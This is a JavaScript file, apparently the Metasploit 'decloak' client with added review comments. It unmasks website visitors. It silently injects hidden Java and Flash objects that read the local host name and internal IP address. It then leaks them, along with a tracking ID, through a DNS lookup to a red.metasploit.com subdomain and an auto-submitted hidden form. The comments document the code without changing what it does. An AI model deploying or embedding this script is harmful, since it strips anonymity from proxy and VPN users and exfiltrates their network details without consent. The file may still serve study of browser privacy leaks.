
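// Shared state for the stages below. These stay plain `var` globals because
// every function in this file reads or writes them by bare name.

// Placed in the report form's `rhost` field, in the probe host name, and in the
// applet/Flash parameters. Presumably the visitor's address as the server saw
// it, filled in per request -- confirm against whatever generates this page.
var ehost = '38.103.63.17';
// Identifier sent with every channel (applet, Flash, probe host name, form);
// presumably what lets the receiving side correlate them -- confirm.
var cid   = '56a2e6725b6480fba8c9a91f479f6e1c';
// Overwritten by decloakAppletCallback; not read anywhere else in this file.
var rhost = '0.0.0.0';
// Local host name, as reported by the applet callback or the Netscape fallback.
var lhost = 'unknown';
// Value handed back by the Flash movie through declockFlashCallback.
var faddr = '0.0.0.0';
// Local address, as reported by the applet callback or the Netscape fallback.
var laddr = '0.0.0.0';
// Passed to the applet as its `UDPPort` parameter.
var uport = 5353;
// Passed to the Flash movie as its `port` argument.
var fport = 53530;
// Number of decloakStage2 polls so far.
var count = 0;
// Not referenced by any function in this file.
var loopc = 0;

// Interval handles. The functions below assign `timer2` and `timer4`; only the
// underscore spellings used to be declared, which left the real handles as
// implicit globals (a ReferenceError under strict mode). Both spellings are
// declared so nothing that relied on the old names breaks.
var timer_2;
var timer_3;
var timer_4;
var timer2;
var timer4;

// 10 seconds for both java and flash to load
var appletTimeout = 10;
// Set once the applet has called back, or at once when Java is not enabled.
var appletOk = false;
// Set once the Flash movie has called back.
var flashOk  = false;
// When true, the final stage posts the collected values to report.html.
var report = false;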


/**
 * Pick the node that injected markup is attached to.
 *
 * Falls back from <body> to the root element, and finally to a detached <div>
 * so callers always get something they can append to.
 *
 * @returns {Object} document.body, document.documentElement, or a new div.
 */
function decloakGetBody() {
	return document.body ||
		document.documentElement ||
		document.createElement("div");
}

/**
 * Look an element up by id, using whichever lookup API the browser exposes.
 *
 * Tries document.getElementById first, then the legacy document.all and
 * document.layers collections.
 *
 * @param {string} o - Element id.
 * @returns {Object|null} Whatever the lookup yields, or null when the document
 *     exposes none of the three APIs.
 */
function decloakLocateElementById(o) {
	var found = null;

	if (document.getElementById) {
		found = document.getElementById(o);
	} else if (document.all) {
		found = document.all[o];
	} else if (document.layers) {
		found = document.layers[o];
	}

	return found;
}
	
/**
 * Receive the values reported by the Java applet and mark the applet as done.
 *
 * The function name is handed to the applet as its `Callback` parameter; it is
 * not called from anywhere in this file.
 *
 * @param {string} xrhost - Stored in the global `rhost`.
 * @param {string} xlhost - Stored in the global `lhost` (local host name).
 * @param {string} xladdr - Stored in the global `laddr` (local address).
 * @param {*} external - Accepted but not used.
 */
function decloakAppletCallback(xrhost,xlhost,xladdr,external) {
	appletOk = true;
	laddr = xladdr;
	lhost = xlhost;
	rhost = xrhost;
}

/**
 * Receive the value reported by the Flash movie and mark Flash as done.
 *
 * Not called from this file; presumably invoked by flash.swf, so the misspelt
 * name ("declock") has to stay as it is -- confirm against the movie.
 *
 * @param {string} buff - Percent-escaped value; decoded with unescape() and
 *     stored in the global `faddr`.
 */
function declockFlashCallback(buff) {
	var decoded = unescape(buff);

	flashOk = true;
	faddr = decoded;
}

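/**
 * Read the local host name and address through the browser's Java bridge when
 * the browser identifies as Netscape and reports Java as enabled.
 *
 * Updates the globals `lhost` and `laddr`; does nothing in any other browser
 * or when navigator.javaEnabled() is false.
 *
 * The temporaries used to be assigned without a declaration, which created the
 * globals `thost`/`taddr` and throws a ReferenceError under strict mode. They
 * are locals now.
 */
function decloakNetscapeFallback() {
	var thost;
	var taddr;

	if (navigator.appName=='Netscape' && navigator.javaEnabled()) {

		// eval() only ever sees these two constant strings, so nothing untrusted
		// reaches it. A Content-Security-Policy without 'unsafe-eval' blocks it.
		thost = eval('java.net.InetAddress.getLocalHost().getHostName()');
		// Loose comparisons are kept: values coming back over the Java bridge
		// may not be primitive strings -- confirm before tightening to !==.
		if (thost && thost != 'localhost' && thost != '127.0.0.1') {
			lhost = thost;
		}

		taddr = eval('java.net.InetAddress.getLocalHost().getHostAddress()');
		// A differing, non-loopback address is appended after a ':' instead of
		// replacing what the applet callback may already have stored.
		if (taddr && (laddr != taddr && taddr != '127.0.0.1')) {
			laddr += ':' + taddr;
		}
	}
}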

/**
 * Build a <param> element through the DOM.
 *
 * No function in this file calls it; the applet and Flash markup are assembled
 * as strings instead.
 *
 * @param {string} name - Assigned to the element's `name`.
 * @param {string} value - Assigned to the element's `value`.
 * @returns {Object} The new element.
 */
function decloakMakeParam(name, value) {
	var paramNode = document.createElement("param");

	paramNode.name = name;
	paramNode.value = value;

	return paramNode;
}

/**
 * Stage 4: stop the stage-3 timer and, in report mode, post the collected
 * values to report.html.
 *
 * Replaces the page body with a form of five hidden inputs (rhost, lhost,
 * laddr, faddr, cid), fills them from the globals and submits it. The `rhost`
 * field is filled from `ehost`, not from the global `rhost`. Values are set
 * through each input's `.value`, so they are never parsed as markup.
 *
 * Without report mode the function only clears the timer.
 */
function decloakStage4() {
	var fieldNames = ['rhost', 'lhost', 'laddr', 'faddr', 'cid'];
	var formMarkup;
	var fieldValues;
	var n;

	clearInterval(timer4);

	if (report) {
		formMarkup = "<" + "form action='report.html' method='POST'>";
		for (n = 0; n < fieldNames.length; n++) {
			formMarkup += "<" + "input type='hidden' name='" + fieldNames[n] +
				"' id='" + fieldNames[n] + "'>";
		}
		formMarkup += "<" + "/form>";

		decloakGetBody().innerHTML = formMarkup;

		fieldValues = {
			rhost: ehost,
			lhost: lhost,
			laddr: laddr,
			faddr: faddr,
			cid: cid
		};
		for (n = 0; n < fieldNames.length; n++) {
			decloakLocateElementById(fieldNames[n]).value = fieldValues[fieldNames[n]];
		}

		document.forms[0].submit();
	}
}

/* Insert the IMG request */	
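/**
 * Stage 3: request a hidden 1x1 image whose host name is built from `cid`,
 * `ehost` and `laddr`, then hand over to decloakStage4.
 *
 * The values travel inside the host name itself, so the name lookup for the
 * image presumably exposes them to whoever serves that DNS zone, separately
 * from the HTTP request -- confirm against the server side.
 *
 * decloakStage4 runs from the image's load/error handlers and from a 3-second
 * interval stored in the global `timer4`, which decloakStage4 clears.
 *
 * The URL and the image element used to be assigned to undeclared names,
 * creating the globals `u` and `i` (a ReferenceError under strict mode); they
 * are locals now. The interval callback is a function instead of a string, so
 * it is no longer evaluated as source text.
 */
function decloakStage3() {
	var probeUrl;
	var img;

	decloakNetscapeFallback();

	probeUrl = "http://" + cid + ".http." + ehost + "." + laddr + ".red.metasploit.com/";

	img = document.createElement("img");
	img.src = probeUrl;
	img.width = 1;
	img.height = 1;
	img.onload  = decloakStage4;
	img.onerror = decloakStage4;
	img.style.visibility = 'hidden';

	decloakGetBody().appendChild(img);

	// NOTE(review): `innerHTML +=` serialises and re-parses the whole body, so
	// the <img> appended above is replaced by a copy that has no onload/onerror
	// handlers. In report mode only the interval below reaches decloakStage4.
	if (report)
		decloakGetBody().innerHTML += "Waiting for the image to load...<br>\n";

	// The wrapper looks decloakStage4 up on every tick, as the string form did.
	timer4 = setInterval(function () { decloakStage4(); }, 3000);
}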

/* Wait for the callback or the timeout */
/**
 * Stage 2: poll until both plug-in callbacks have reported or the wait runs out.
 *
 * Each call increments the global `count`. Once the count (before the
 * increment) exceeds twice `appletTimeout`, or both `appletOk` and `flashOk`
 * are set, the polling interval `timer2` is cleared and stage 3 starts.
 */
function decloakStage2() {
	// The counter is advanced on every call, whether or not both flags are set.
	var waitedTooLong = count++ > (appletTimeout*2);
	var bothReported = appletOk && flashOk;

	if (!waitedTooLong && !bothReported) {
		return;
	}

	clearInterval(timer2);
	decloakStage3();
}


/* Start the decloaking process */
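/**
 * Entry point: inject the Flash object and, when Java is enabled, the applet,
 * then start polling for their callbacks every 500 ms.
 *
 * A browser where navigator.javaEnabled() is false skips the applet entirely;
 * `appletOk` is set at once so stage 2 waits for Flash only.
 *
 * The markup string and its container used to be assigned to undeclared names,
 * creating the globals `str` and `d` (a ReferenceError under strict mode);
 * they are locals now. The interval callback is a function instead of a
 * string, so it is no longer evaluated as source text.
 *
 * @param {*} doReport - Truthy to switch on report mode (global `report`).
 *     A falsy value leaves `report` as it was.
 */
function decloak(doReport) {
	var markup;
	var holder;

	if (doReport) {
		report = true;
	}

	decloakFlash();

	/* Insert the APPLET request */
	if (navigator.javaEnabled()) {
		// The tag and attribute names are split across literals, presumably so
		// that the script text never contains them whole -- confirm. The string
		// handed to innerHTML is unchanged.
		// NOTE(review): ehost, cid and uport are concatenated into attribute
		// values unescaped; that is only safe while they stay page-defined
		// constants.
		markup  = "<" + "apple" + "t code='";
		markup += "HelloWorld.cla" + "ss' ";
		markup += "mayscr" + "ipt width=1 height=1>";
		markup += "<" + "param name='Callback' value='decloakAppletCallback'>";
		markup += "<" + "param name='External' value='" + ehost + "'>";
		markup += "<" + "param name='ClientID' value='" + cid + "'>";
		markup += "<" + "param name='UDPPort'  value='" + uport + "'>";
		markup += "<" + "/apple" + "t>";

		holder = document.createElement("div");
		holder.style.visibility = 'hidden';
		holder.innerHTML = markup;

		decloakGetBody().appendChild(holder);
	} else {
		appletOk = true;
	}

	// The wrapper looks decloakStage2 up on every tick, as the string form did.
	timer2 = setInterval(function () { decloakStage2(); }, 500);
}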

/* Insert the FLASH object */
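/**
 * Inject a hidden 1x1 Flash <object>/<embed> that loads flash.swf with `cid`,
 * `fport` and `ehost` in its query string.
 *
 * allowScriptAccess="always" lets the movie call script in this page whatever
 * origin the movie is served from; the result presumably comes back through
 * declockFlashCallback -- confirm against the movie.
 *
 * The container used to be assigned to an undeclared name, creating the global
 * `d` (a ReferenceError under strict mode); it is a local now.
 */
function decloakFlash() {
	// NOTE(review): the three values are concatenated unescaped into a query
	// string and then into attribute values; that is only safe while they stay
	// page-defined constants.
	var arg = 'cid=' + cid + '&port=' + fport + '&client=' + ehost;

	// Several attribute fragments are joined with no whitespace between them.
	// HTML parsers recover from that, so the markup is kept byte-identical.
	var str = '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"'
	+ 'width="1" height="1"'
	+ 'codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">'
	+ '<param name="movie" value="flash.swf?' + arg + '" />'
	+ '<embed src="flash.swf?' + arg+ '"'
	+ 'width="1" height="1"'
	+ 'play="true"'
	+ 'loop="false"'
	+ 'allowScriptAccess="always"'
	+ 'type="application/x-shockwave-flash"'
	+ 'pluginspage="http://www.macromedia.com/go/getflashplayer">'
	+ '<\/embed>'
	+ '<\/object>';

	var holder = document.createElement("div");
	holder.style.visibility = 'hidden';
	holder.innerHTML = str;

	decloakGetBody().appendChild(holder);
}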




